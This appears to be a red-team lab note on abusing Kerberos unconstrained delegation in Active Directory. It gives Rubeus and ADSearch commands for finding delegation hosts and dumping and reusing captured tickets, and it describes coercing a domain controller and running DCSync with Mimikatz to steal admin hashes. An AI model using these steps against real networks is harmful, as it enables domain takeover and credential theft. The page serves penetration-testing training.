search

Unconstrained Delegation

If we can compromise a machine with unconstrained delegation, we can extract any TGTs from its memory and use them to impersonate the users against other services in the domain.

hashtag
Dump all permitted computers

(Domain Controllers are always permitted for unconstrained delegation.)

ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
circle-info

Can also check using Bloodhound

hashtag
Check (triage) all current tickets

Rubeus.exe triage

| 0x11674c | nlamb @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO

hashtag
Extract the TGT and leverage it via a new logon session

Rubeus.exe dump /luid:0x11674c /nowrap
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFwj[...]MuSU8=

[+] ProcessID       : 2964
steal_token 2964

hashtag
Force the domain controller to authenticate to the web server to steal its TGT

Cache tickets

Where: DC-2 is the "target" WEB is the "listener"

Rubeus will then capture the ticket.

Either use this for S4U2Self abuse -> S4U2Self Abuse, or ->

Inject the ticket into memory

With the TGT of the domain controller machine account injected into memory, we can perform actions in the context of that TGT. However, the CDC01$ account is not a local administrator on the domain controller so we cannot directly perform lateral movement with it.

On the other hand, the account has domain replication permissions, which means we can perform dcsync and dump the password hash of any user.

Let's use Mimikatz to perform DCSync (utilizing kiwi for AV evasion)

circle-info

In this case we grabbed the hash of a DA, could also grab hash of krbtgt

hashtag
Tooling

Last updated